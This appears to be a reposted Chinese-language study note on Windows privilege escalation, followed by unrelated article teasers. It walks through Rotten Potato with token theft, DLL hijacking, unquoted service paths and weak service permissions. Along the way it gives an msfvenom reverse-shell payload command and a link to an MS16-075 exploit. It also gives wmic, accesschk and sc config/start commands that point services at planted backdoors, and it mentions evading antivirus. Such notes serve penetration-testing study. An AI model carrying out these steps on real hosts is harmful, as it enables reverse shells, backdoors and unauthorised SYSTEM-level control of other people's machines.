62权限提升-烂土豆dll劫持引号路径服务权限

必备知识点:令牌窃取配合烂土豆提权,

单纯令牌窃取:web提权或者本地提权

如果配合烂土豆提权,就需要web权限和数据库权限。配合烂土豆的就用不了本地提权了,

烂土豆的原理,

他进行提权的时候用到的是关于windows上面服务权限(例如iis,msyql等等),只有这种权限才可以,

烂土豆对比热土豆的优点

100%可靠,立即生效(不像,hot,potato那样有时候需要等windows更新结果),当时通杀所有版本。

主要集中在2018以前的版本,2018之后的版本里有几率就很小了

案例一Win2012-烂土豆配合令牌窃取提权-Web权限 

web层面权限提升至管理员权限,

操作过程,在webshell上面上传烂土豆,在执行烂土豆,利用窃取模块窃取到ssytem权限

先用mft生成马子出来,

msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f exe > shell.exe 

然后把生成的后门通过冰蝎上传到目标主机就很好

现在查看自己的权限就只是个webshell的权限,

在webshell上直接执行马子,拿下反弹shell

之后

直接使用令牌窃取,是拿不到system的权限的,令牌窃取是需要一个足够权限的用户才可以进行,单纯的一个webshell是不可行的,

烂土豆下载:https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS16-075 

把下载好的烂土豆,上传到对方文件夹上面,

然后这个文件夹要在反弹shell那里执行

来到放有烂土豆的目录下面,发现没办法执行查看目录,这个直接用webshell连接工具查看就行

任何就直接执行烂土豆

再重复一下令牌窃取的操作

直接窃取系统权限

system权限

案例二Win2012-DLL 劫持提权应用配合 MSF-Web 权限 

这个提权方法比较鸡肋,他鸡肋在目标服务器上需要安装一些特定的软件的控制权限和启用的配合,如果对方没有装,那dll劫持基本上就用不了,还需要这个软件的一些覆盖权限,

基本上windows操作系统通杀的

原理:Windows 程序(exe)启动的时候需要 DLL库的支持,这个程序在启动的时候,会默认调用一些dll库,去进行一些加载,dll库是可以实现一些功能的,如果我能实现自定义dll,就能实现控制这台执行的东西和权限,

windwos在执行dll文件的时候会有一个顺序

会先从自身目录去寻找dll文件,如果没有就去找下面的目录挨个查找

windows/system32

windwos/system

windows

过程:信息收集(收集有哪些特定软件),进程调试(分析程序在运行时调用了那些dll)执着dll并上传(制作后门dll去替换原有的dll)替换dll后启动应用程序成功

通过连接好的后门,查看桌面文件,找到了带有dll文件的东西,

用火绒剑进程查看,查看详细的信息

我们的主要看的目标是非系统文件,我找到目标的非系统的dll文件,就是在他自身文件夹里面等等文件,是我们可以操控的,别的地方比如windows之类的,根本没有办法操作,就想办法去替换他自身文件夹里面的dll文件, 

任何在mft生成出一个后门dll

然后上传到root用户下面

之后在目标靶机上操作就行了

把正常文件修改一下,把后门dll修改为正常文件的名字,保证调用的时候,调用后门文件

开启监听

之后可以通过令牌窃取,进一步提升自己的权限

直接到系统权限

然后这个提权方法鸡肋的对方,就算对面有第三方软件,还要有可以替换的权限webs hell、权限,假如所有都准备好了,也要等待对方管理员去启动这个软件,才能成功反弹shell,和接下来的提权操作,

案例三Win2012-不带引号服务路径配合 MSF-Web,本地权限 

服务默认运行的时候,大概率会是系统权限,

默认执行的都会有一个指定的文件,还会跟上命令去运行,服务一运行,可执行文件和参数都会被调用执行,里面的文件被系统权限调用去执行,他也会享有系统权限,程序在配置的时候出现不带引号的安全问题,就会出现安全问题。

有一些服务会带有一些双引号,

因为那个program哪里有一个空格,没有家双引号,系统就可能会认为在空格之后都是参数,而不是文件夹的命名,加上双引号之后就不会,只会把后面的-f作为参数。

攻击过程:检测引号服务路径(找有没有带引号的服务路径,因为带有引号才能正常的调用这个参数,就找那些没有引号的),利用路径制作文件并且上传,重启服务或者等待服务重启,调用后成功。

检测就直接复制这段字符串拿到cmd运行

wmic service get name,displayname,pathname,startmode |findstr /i "Auto" |findstr /i /v "C:\Windows\\" |findstr /i /v """
 

他这个命令就是去调用进程服务里面执行没有调用引号的

看回显有两个地方可以操作,但是第一个不行,因为没有空格,第二个可以,有空格的存在,

老师拿本地cmd演示一下操作,把cmd移动到c://program files 这里来,拖到cmd里面

可以看到自动加了双引号,如果去掉双引号,我们在执行这条命令试试

如何把cmd移动到和/program files一个目录下面来,把cmd的名字改成program.exe文件,再去执行那条没有引号的命令

直接就可以运行那个program.exe文件

所有,如果不带有引号就直接执行木马相同的文件,我们就可以放一个木马和这个目录名字一样,去执行它;就是把后门命名为program.exe,放到c盘那个目录下面,对应测试的结果,

同样用mft生成个program.exe后门文件,然后通过后门木马,上传到目标的c盘下来

在根据测试的时候找到的不带有引号的,执行/program files文件夹的,在webshell里面启动服务,

就比如这种没有双引号的服务,启动它,用webshell就可以启动

sc start "test"  启动服务命令

webshell就可以

直接拿下system权限

但是这个在进程崩了或者结束的时候,就不能用了,不要紧把exe文件换成一个远程后门木马或者不用一直启动的后门木马就可以了,

注意:这个提权要先检测对面服务有没有这个安全问题,服务没有双引号就符合这个问题上传之后还要执行那个服务,但是大多数都没有问题。

案例四Win2012-不安全的服务权限配合 MSF-本地权限

原理:即使正确的引用了路径,也可能存在其他的安全问题,由于错误的配置,在分配这个服务权限的时候如果没有分配好,也会造成安全问题,

过程:检测服务权限配置(看看有没有可以操作的服务配置),

---下载检测当前用户权限的:AccessChk:https://docs.microsoft.com/en-us/sysinternals/downloads/accesschk 

这个只适用于本地提权

执行命令  accesschk.exe -uwcqv "administrators" *

检测的administrators所有权的所有服务,然后就可以把administrators换成当前用户的权限,可以去操作的服务。

换成得到普通权限用户,如果是这个权限就gg,搞不了

老规格,找到自己要做测试的目标,生成马子出来

名字就命名为program.exe

---创建服务(这里只有管理员才能创建,如果是webshell估计不行):

---sc create instsrv binpath= "C:\Program Files\instsrv.exe --service -r C:\Program Files" displayname= "test" start= auto

这个创建的服务就只作为测试,刚别的我怕把我虚拟机搞崩了

替换服务的路径

sc config " 服务名字" binpath="c:\\program.exe" 

这个名字

替换成功,之后直接运行这个程序

sc start "进程名字" 

之后就接收到反弹shell

管理员权限。

总结:这些安全问题是由于网站管理员自身配置造成的,安装一些软件,软件自身配置造成的,如果没有这些,win就很难提权,

剩下两个提权没有什么意义,了解了解就行

关于 Windows 相关知识点总结说明-权限层,系统层,防护层等

提取环境分为web(web又分为asp,php之类,唯独jsp不需要提权)和本地

权限划分:system > administer > users > webshell权限 

本地权限:一般在内网中才会介绍,内网渗透的时候有可能通过网站渗透,也可能是拿到一个用户权限,如果不是域管理权限,域上面单纯的一个操作ftp传输的用户,这种层面的提取称为本地提权,

有些提权方法只针对部分操作系统,大部分都是win2018之前,

相关文件及后门免杀问题等,避免上传上去就被杀软杀了

fa

cai

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mfbz.cn/a/267541.html

如若内容造成侵权/违法违规/事实不符,请联系我们进行投诉反馈qq邮箱809451989@qq.com,一经查实,立即删除!

相关文章

代码随想录算法训练营第四十三天|1049. 最后一块石头的重量 II、494. 目标和、474.一和零

代码随想录 (programmercarl.com) 1049. 最后一块石头的重量II 核心思路&#xff1a;将石头分成重量近似的两堆&#xff0c;与之前的416.分割等和子集问题很相似。 1.确定dp数组以及下标的含义 dp[j]表示容量为j的背包&#xff0c;最多可以背的最大重量为dp[j]。 其中&…

FPGA高端项目:UltraScale GTH + SDI 视频编解码,SDI无缓存回环输出,提供2套工程源码和技术支持

目录 1、前言免责声明 2、相关方案推荐我这里已有的 GT 高速接口解决方案我目前已有的SDI编解码方案 3、详细设计方案设计框图3G-SDI摄像头LMH0384均衡EQUltraScale GTH 的SDI模式应用UltraScale GTH 基本结构参考时钟的选择和分配UltraScale GTH 发送和接收处理流程UltraScale…

HFish蜜罐搭建及简单使用

一、HFish蜜罐 HFish是一款社区型免费蜜罐&#xff0c;侧重企业安全场景&#xff0c;从内网失陷检测、外网威胁感知、威胁情报生产三个场景出发&#xff0c;为用户提供可独立操作且实用的功能&#xff0c;通过安全、敏捷、可靠的中低交互蜜罐增加用户在失陷感知和威胁情报领域的…

零基础学人工智能:TensorFlow 入门例子

识别手写图片 因为这个例子是 TensorFlow 官方的例子&#xff0c;不会说的太详细&#xff0c;会加入了一点个人的理解&#xff0c;因为TensorFlow提供了各种工具和库&#xff0c;帮助开发人员构建和训练基于神经网络的模型。TensorFlow 中最重要的概念是张量&#xff08;Tenso…

I Doc View在线文档预览系统 cmd.json RCE漏洞复现

0x01 产品简介 IDocView是一个在线文档解析应用,旨在提供便捷的文件查看和编辑服务。 0x02 漏洞概述 I Doc View在线文档预览系统 cmd.json 接口处存在命令执行漏洞,攻击者可通过该漏洞在服务器端任意执行代码,写入后门,获取服务器权限,进而控制整个web服务器。 0x03 影…

Linux入门基础知识

1. 什么是操作系统&#xff1f; 正式定义&#xff1a;负责管理计算机的硬件和软件资源&#xff0c;并合理的组织调度计算机的工作和资源的分配&#xff0c;以提供给用户和其他软件方便的接口和环境&#xff0c;它是计算机系统的系统软件。 通俗定义&#xff1a;是一个系统软件…

【头歌系统数据库实验】实验11 SQL互联网业务查询-2

目录 第1关&#xff1a;查询某网站每个日期新用户的次日留存率 第2关&#xff1a;查询满足条件的用户 第3关&#xff1a;查询未完成订单率排名前三的用户 如果对你有帮助的话&#xff0c;不妨点赞收藏评论一下吧&#xff0c;爱你么么哒&#x1f618;❤️❤️❤️ 第1关&…

matlab实践(十一):导弹追踪

1.题目 a9.94,x062.06 2.方程 我们有&#xff1a; ( d x d t ) 2 ( d y d t ) 2 w 2 (\frac{\mathrm d\mathrm x}{\mathrm d\mathrm t})^2(\frac{\mathrm d\mathrm y}{\mathrm d\mathrm t})^2\mathrm w^2 (dtdx​)2(dtdy​)2w2 还有导弹始终指向船 ( d x d t d y d t ) …

Qt 网络编程

QT 网络编程 TCP 编程 模块引入 QT network 头文件 #include <QTcpServer> // TCP服务器端使用 #include <QTcpSocket> // TCP服务器和客户端都使用 编程流程 服务端 1&#xff09;实例化 QTcpServer 对象 -----------------------------> socket 2&#x…

【微服务】springboot整合kafka-stream使用详解

目录 一、前言 二、kafka stream概述 2.1 什么是kafka stream 2.2 为什么需要kafka stream 2.2.1 对接成本低 2.2.2 节省资源 2.2.3 使用简单 2.3 kafka stream特点 2.4 kafka stream中的一些概念 2.5 Kafka Stream应用场景 三、环境准备 3.1 搭建zk 3.1.1 自定义d…

05|提示工程(下):用思维链和思维树提升模型思考质量 ## 什么是 Chain of Thought

05&#xff5c;提示工程&#xff08;下&#xff09;&#xff1a;用思维链和思维树提升模型思考质量 什么是 Chain of Thought CoT 这个概念来源于学术界&#xff0c;是谷歌大脑的 Jason Wei 等人于 2022 年在论文《Chain-of-Thought Prompting Elicits Reasoning in Large La…

Unity使用Rider作为默认编辑器

01.Edit -> Preferences 02.Externel Tools -> Open by file extension 如果界面选项有Rider直接选择&#xff0c;如果没有选择Browse) 03.选择rider64.exe 04.成功关联

【C# 技术】 C# 常用排序方式——常规数据排序

C# 常用排序方式——常规数据排序 前言 在最近的项目中经常会对C#中的数据进行排序&#xff0c;对于基本数据类型&#xff0c;其排序方式比较简单&#xff0c;只需要调用内置算法即可实现&#xff0c;但对于自定义数据类型以及自定义排序规则的情况实现起来就比较麻烦&#…

西门子博途与菲尼克斯无线蓝牙模块通讯

菲尼克斯无线蓝牙模块 正常运行时,可以使用基站控制字0发送00E0(得到错误代码命令) 正常运行时,可以使用基站控制字0发送00E0(得到错误代码命令)得到各个无线I/O是否连 接的信号(状态字IN word 1的第2、6、10位) 小车1连接状态 小车2连接状态 小车3连接状态 1#小车自…

操作系统 day18(死锁)

死锁 定义 在并发环境下&#xff0c;各进程因竞争资源而造成的一种互相等待对方手里的资源 &#xff0c;导致各进程都阻塞&#xff0c;都无法向前推进的现象&#xff0c;就是死锁。发生死锁后若无外力干涉&#xff0c;这些进程都将无法向前推进。如下图&#xff1a; 死锁、饥饿…

激发大规模ClickHouse数据加载(2/3)大规模数据加载的加速调优

本文字数&#xff1a;4552&#xff1b;估计阅读时间&#xff1a;12 分钟 作者&#xff1a;Maksim Kita 审校&#xff1a;庄晓东&#xff08;魏庄&#xff09; 本文在公众号【ClickHouseInc】首发 Meetup活动&#xff1a; ClickHouse Shenzhen User Group第1届 Meetup 火热报名中…

网络第3天

基于UDP的TFTP文件传输 功能&#xff1a;下载、上传、退出 #include <myhead.h> #define IP "192.168.8.100" #define PORT 69 int download_file(int…

方法论系列:数据科学框架入门

目录 第一章 - 数据科学家如何战胜困难第二章 - 数据科学框架第三章 - 步骤1&#xff1a;定义问题和步骤2&#xff1a;收集数据第四章 - 步骤3&#xff1a;准备数据第五章 - 数据清洗的4个C&#xff1a;纠正、补全、创建和转换第六章 - 步骤4&#xff1a;使用统计学进行探索性…

Unity新动画系统之动画层和动画遮罩

Unity新动画系统之动画层和动画遮罩 一、介绍二、动画骨骼遮罩层使用第一种就是create一个avatar Mask,如下&#xff1a;第二种遮罩&#xff0c;就是直接在动画剪辑的属性上更改&#xff0c;如图一为humanoid类型的动画剪辑属性&#xff1a; 一、介绍 之前分享过FSM动画控制系…

组学无参比对教程

转录组无参比对教程 当作物是没有参考基因组时&#xff0c;需要无参进行比对。Trinity是现在使用最广泛的转录组De novo组装软件。 Trinity 是无参考转录组从头组装转录组的常用软件&#xff0c;且trinity的使用文档非常详细&#xff0c;整合的内容非常完整&#xff0c;包括从…